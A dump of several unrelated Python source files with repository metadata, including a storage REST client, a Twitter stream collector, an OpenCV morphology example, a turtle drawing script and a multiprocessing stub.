| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
class DataProvider:
def get(self, datatype, dataid):
pass
def put(self, dataobject):
pass
def delete(self, dataobject):
pass
def query(self, datatype):
pass
def get_actions(self, from_date, to_date):
pass
def get_horse_schedules(self, horse_id):
pass
def get_horse_people(self, horse_id, person_type=None):
pass
class QuerySpec:
DataType = ''
Filters = {}
Sorts = {}
_doquery = None
def __init__(self, datatype, doquery):
self.DataType = datatype
self._doquery = doquery
def filter(self, prop, operator, value):
queryable = False
if prop == 'id':
queryable = True
elif self.DataType == 'schedule' and prop == 'horse_id':
queryable = True
elif self.DataType == 'association' and (prop == 'horse_id' or prop == 'person_id'):
queryable = True
elif self.DataType == 'action' and prop == 'horse_id':
queryable = True
self.Filters[prop] = (operator, value, queryable)
return self
def sort(self, prop, order='asc'):
self.Sorts[prop] = order
return self
def go(self):
return self._doquery(self)
|
[
"todd@g3s.net"
] |
todd@g3s.net
|
94540c0cfc7509d41aeaeedc64a11096d5b2616a
|
81d955c3ac886e690ceb01026ed769b1784dbef9
|
/purity_fb/purity_fb_1dot8/apis/quotas_groups_api.py
|
665498e5f3f9ea81a3c569698b958f1cb115c367
|
[
"Apache-2.0"
] |
permissive
|
etsangsplk/purity_fb_python_client
|
bc525ef1a18f6a79c1536cb4519a7efd58d09d89
|
0807a0fa2eab273bc08f73266d9cda9fa33b37bd
|
refs/heads/master
| 2020-06-03T05:49:03.015147
| 2019-05-16T06:11:40
| 2019-05-16T06:11:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,547
|
py
|
# coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0 - 1.8), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.8
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class QuotasGroupsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_group_quotas(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_quotas_with_http_info(**kwargs)
else:
(data) = self.create_group_quotas_with_http_info(**kwargs)
return data
def create_group_quotas_with_http_info(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_quotas(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_quotas_with_http_info(**kwargs)
else:
(data) = self.delete_group_quotas_with_http_info(**kwargs)
return data
def delete_group_quotas_with_http_info(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_group_quotas(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_group_quotas_with_http_info(**kwargs)
else:
(data) = self.list_group_quotas_with_http_info(**kwargs)
return data
def list_group_quotas_with_http_info(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'limit', 'sort', 'start', 'token', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_group_quotas(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_quotas_with_http_info(**kwargs)
else:
(data) = self.update_group_quotas_with_http_info(**kwargs)
return data
def update_group_quotas_with_http_info(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"azaria.zornberg@purestorage.com"
] |
azaria.zornberg@purestorage.com
|
bd46f51391adaab5845a6bb2c79fc3eaaea9933a
|
878ef94475b349e567f4cae860fc72fc10b98b37
|
/tests/test_src_introspection.py
|
44936aba966194503e6b4ce68c650a21b71cc7dc
|
[
"BSD-2-Clause"
] |
permissive
|
alexswerner/robotpkg_helpers
|
ec75180a748c5b0af3efed0762a66442469471f8
|
4cda66e8b9eeedc4dea9f5d4754595e2813a10ad
|
refs/heads/master
| 2021-05-19T13:34:59.518543
| 2020-04-03T01:22:05
| 2020-04-03T01:22:05
| 251,726,724
| 0
| 0
|
BSD-2-Clause
| 2020-03-31T20:43:00
| 2020-03-31T20:43:00
| null |
UTF-8
|
Python
| false
| false
| 1,005
|
py
|
#!/usr/bin/python3
from unittest import TestCase
from robotpkg_helpers import RobotpkgSrcIntrospection
from robotpkg_helpers import init_environment_variables
from robotpkg_helpers.utils import add_robotpkg_mng_variables
robotpkg_root='/integration_tests/robotpkg-test-rc'
#robotpkg_vars = add_robotpkg_mng_variables(robotpkg_root)
arpg_src_intros = RobotpkgSrcIntrospection(ROBOTPKG_ROOT_SRC=robotpkg_root+'/robotpkg')
add_robotpkg_mng_variables(arpg_src_intros)
init_environment_variables(arpg_src_intros,robotpkg_root)
arpg_src_intros.display()
arpg_src_intros.save('rpg_src_intros.json')
arpg_src_intros.package_dict['jrl-walkgen-v3'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['pinocchio'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['talos-simulation'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
|
[
"ostasse@laas.fr"
] |
ostasse@laas.fr
|
9e750f8075d60ec1bff5c0ffbb0d33f61c64a8dd
|
2b7cc7d56ee829213d0111f9c729997f708f9c66
|
/CreateDB/main.py
|
0bfe8ad211906988fffb8422edc8c842c6550f66
|
[] |
no_license
|
Vincentie/TreePrediction
|
69bb3e92afdd9c33070a18478b604d94feaf45bb
|
47d632c5701916a581964bf683d4551e0ededca4
|
refs/heads/master
| 2021-01-20T17:29:30.309974
| 2018-09-01T14:57:43
| 2018-09-01T14:57:43
| 90,878,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
__author__ = 'JianxuanLiu'
from parse_and_save_data import parse_and_save_data
from tradeDays import getTradeDays
from computeSentimentals import computeSentiments
import numpy as np
import pandas as pd
from datetime import datetime
from datetime import timedelta
import sqlite3
""" This main.py is performed to create a data table whose data can be picked to aplly a prediction tree.
Specifically, volume weighted average prices of different gold futures' prices and sentimental grades
processed by NLP methods are those data to be trained in a prediction tree model.
"""
def computeVWFactor(df, factor):
""" Computer a series of factors in a DataFrame using volume weighted avearge method.
"""
df = df.replace('', np.nan)
df.fillna(method='pad')
df.fillna(method='bfill')
df1 = df[['Volume']].astype(float)
df2 = df[[factor]].astype(float)
df2.columns = ['Volume']
vw = np.sum((df1 * df2)['Volume']) / np.sum(df1['Volume'])
return vw
if __name__ == '__main__':
beginDate = '2012-01-01'
endDate = '2017-01-01'
saveUrl1 = 'Data/FData.sqlite'
saveUrl2 = 'Data/Sentiments.sqlite'
"""Parse and save data"""
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_trade').parse_and_save_data()
parse_and_save_data(beginDate, endDate, saveUrl1, option='au_sentiments').parse_and_save_data()
"""Obatain the trading data and sentimental grades of every day for future use."""
con = sqlite3.connect(saveUrl1)
sql = "SELECT * from SHFE"
data = pd.read_sql(sql, con)
avgdata = {}
sentiDict = computeSentiments(beginDate, endDate, saveUrl2).getSentiments()
"""Compute the volume weighted average factors and concatenate them with the sentimental grades."""
for date in getTradeDays(beginDate, endDate):
temp_df = data[data.date == date + ' ' + '00:00:00']
values = []
for item in ['Close', 'High', 'Low', 'Change2', 'ChangeofOpenInt']:
values.append(computeVWFactor(temp_df, item))
values.append(float(sum(temp_df['Volume']))) #Add the total trading volume to the values.
values.append(sentiDict[date]) #Add sentimental grades to the values.
key = date
avgdata.setdefault(key, values)
"""Insert the handled data into a new table."""
conna = sqlite3.connect('Data/FAvgData.sqlite')
cursor = conna.cursor()
SQLquery1 = "create table if not exists SHFEAvg(date datetime, Close numeric(15,2), High numeric(15,2), Low numeric(15,2),\
Change2 numeric(15,2), ChangeofOpenInt numeric(25,2), Volume numeric(15,2), Sentiment numeric(15,2) )"
cursor.execute(SQLquery1)
for key, value in avgdata.items():
iter = (key, value[0], value[1], value[2], value[3], value[4], value[5], value[6])
SQLquery2 = "insert into SHFEAvg" + " " + "values(?, ?, ?, ?, ?, ?, ?, ?)"
cursor.execute(SQLquery2, iter)
conna.commit()
conna.close()
|
[
"lavinho@hotmail.com"
] |
lavinho@hotmail.com
|
913a6ef26df5d59e656f52dc0d849452433fc3c5
|
1451a6fa3403a6b33c2adc31d94070ab16dca333
|
/avaliacao2/tweet_stream.py
|
9cfd7f240ef2a61b571df332ef38ba3e010927ef
|
[] |
no_license
|
lucaslioli/ufsm-deep-learning
|
b22a4ac5fa1604f04c9bd422b5b58f6e62577006
|
cf32547969d7ad7ad14235561df70a2a942ea9ec
|
refs/heads/master
| 2020-03-21T14:42:35.469428
| 2019-10-14T12:31:48
| 2019-10-14T12:31:48
| 138,671,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,784
|
py
|
import sys
import tweepy
import pickle as pkl
from authenticate import api_tokens
#override tweepy.StreamListener to add logic to on_status
class MyStreamListener(tweepy.StreamListener):
def on_status(self, status):
if(not status.retweeted and 'RT @' not in status.text[0:4] and status.lang == "pt"):
print("-----------------------------------------")
print("Lang:", status.lang)
print("Text:", status.text)
status.text = status.text.replace('\n', ' ').replace('\r', '')
record("unprocessed_tweets", status.text, status.id)
return True; # Don't kill the stream
def on_error(self, status_code):
print('Encountered error with status code:', status_code)
print("-----------------------------------------")
return True # Don't kill the stream
def on_exception(self, exception):
print('Exception: ', exception)
print("-----------------------------------------")
return True # Don't kill the stream
def on_timeout(self, timeout):
print('Timeout: ', timeout)
print("-----------------------------------------")
return True # Don't kill the stream
# Start the Stream Listener
def start_stream():
print ("---------- STREAMING STARTED -----------")
while True:
try:
myStream = tweepy.streaming.Stream(auth, MyStreamListener())
myStream.filter(track=["a", "e", "i", "o", "u"], stall_warnings=True)
except ValueError:
print('ERROR: Exeption occurred!' + ValueError)
print("-----------------------------------------")
continue
# Records the tweet ID and message into a file
def record(file_name, msg, id = ""):
# Using a txt file for testing purposes
with open("files/"+file_name+".txt", 'a') as f:
if(id != ""):
f.write(str(id) + " => " + msg + '\n')
else:
f.write(msg + '\n')
with open("files/"+file_name+".pkl", 'ab') as f:
pkl.dump(msg, f, pkl.HIGHEST_PROTOCOL)
# Records the tweet ID and message into a file
def record_array(file_name, arr):
# Using a txt file for testing purposes
with open("files/"+file_name+".txt", 'a') as f:
f.write(arr[0] + ", " + arr[1] + '\n')
with open("files/"+file_name+".pkl", 'ab') as f:
pkl.dump(arr, f, pkl.HIGHEST_PROTOCOL)
if __name__ == '__main__':
# Variables that contains the user credentials to access Twitter API
key = api_tokens()
# Tweepy API authentication
auth = tweepy.OAuthHandler(key['consumer_key'], key['consumer_secret'])
auth.set_access_token(key['access_token'], key['access_token_secret'])
# API authentication
api = tweepy.API(auth)
start_stream()
|
[
"loliveira@inf.ufsm.br"
] |
loliveira@inf.ufsm.br
|
746945952b0fab1f51ee929ad0f0cbeb6aad6a22
|
4fd90203c000cc4c15fc6d4538e9536f812af05a
|
/Chapter05/Erosion_Dilation.py
|
c59037f09ddb47686ea3c34fcf5f01d7aa86b049
|
[
"MIT"
] |
permissive
|
drabdkadir/GettingStartedwithPythonfortheInternetofThings
|
77487bbece9fd73ac7d5759d108686e6348dee66
|
86b57062879baaafd8a7ad332057359874bb3978
|
refs/heads/master
| 2020-12-06T15:41:03.055803
| 2019-02-19T10:09:20
| 2019-02-19T10:09:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
# Erosion and Dilation are Morphological Operations
# Erosion: Removes pixels at the boundaries of objects in an image
# Dilation: Adds pixels to the boundaries of objects in an image
# Import Computer Vision package - cv2
import cv2
# Import Numerical Python package - numpy as np
import numpy as np
# Read the image using imread built-in function
image = cv2.imread('image_4.jpg')
# Display original image using imshow built-in function
cv2.imshow("Original", image)
# Wait until any key is pressed
cv2.waitKey(0)
# np.ones returns an array, given shape and type, filled with ones
# np.ones(shape, dtype)
kernel = np.ones((5,5), dtype = "uint8")
# 5 x 5 is the dimension of the kernal
# uint8: is an unsigned integer (0 to 255)
# cv2.erode is the built-in function used for erosion
# cv2.erode(image, kernel, iterations)
erosion = cv2.erode(image, kernel, iterations = 1)
# Display image after erosion using imshow built-in function
cv2.imshow("Erosion", erosion)
# Wait until any key is pressed
cv2.waitKey(0)
# cv2.dilate is the built-in function used for dilation
# cv2.dilate(image, kernel, iterations)
dilation = cv2.dilate(image, kernel, iterations = 1)
# Display image after dilation using imshow built-in function
cv2.imshow("Dilation", dilation)
# Wait until any key is pressed
cv2.waitKey(0)
# Close all windows
cv2.destroyAllWindows()
|
[
"packtadrian@gmail.com"
] |
packtadrian@gmail.com
|
dfffaf1c880faeb1839261b33d4f3388ffc6080d
|
6a84e70184c2ea229a0db4f472426d7d585a1a4a
|
/turtle/lego_heads/head_c_while.py
|
74d373d3ad6ccfd35150faee6d67bf72d756765e
|
[] |
no_license
|
GBSL-Informatik/python-examples
|
5bcf89e255b05dac4a6b7e55efbbe144a2acc070
|
b0ac92a8ebda2cc665d0cc4a8f3d69f3ccfb211f
|
refs/heads/master
| 2023-01-02T15:28:27.863878
| 2020-11-01T21:00:19
| 2020-11-01T21:00:19
| 283,978,874
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
from gbsl_turtle import *
goto(-30, 0, draw=False)
counter = 0
while counter < 8:
forward(60)
left(45)
counter = counter + 1
goto(-30, 100, draw=False)
setheading(180) # Orientierung nach links: ◀️
counter = 0
while counter < 8:
forward(5)
right(45)
counter = counter + 1
goto(30, 100, draw=False)
setheading(0) # Orientierung nach rechts: ▶️
counter = 0
while counter < 8:
forward(5)
left(45)
counter = counter + 1
goto(-48, 40, draw=False)
setheading(-45) # Orientierung nach rechts unten: ↘️
counter = 0
while counter < 3:
forward(40)
left(45)
counter = counter + 1
done()
|
[
"lebalz@outlook.com"
] |
lebalz@outlook.com
|
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6
|
085ce75a507df6e755cabb7a65c4a2a8c98762ba
|
/dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py
|
fee21a8eebfb053e451fc85ad0c04b02fa80eb4e
|
[] |
no_license
|
Arhzi/habr-docker-article
|
d44302db1fe157d81fe0818e762e82218f50e31f
|
6fb094860b612e307beadaeb22981aa0ee64e964
|
refs/heads/master
| 2021-01-23T20:41:47.398025
| 2015-12-10T08:56:33
| 2015-12-10T08:56:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,156
|
py
|
# encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
Return address of obj assuming obj supports buffer inteface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
whose file decriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file decriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
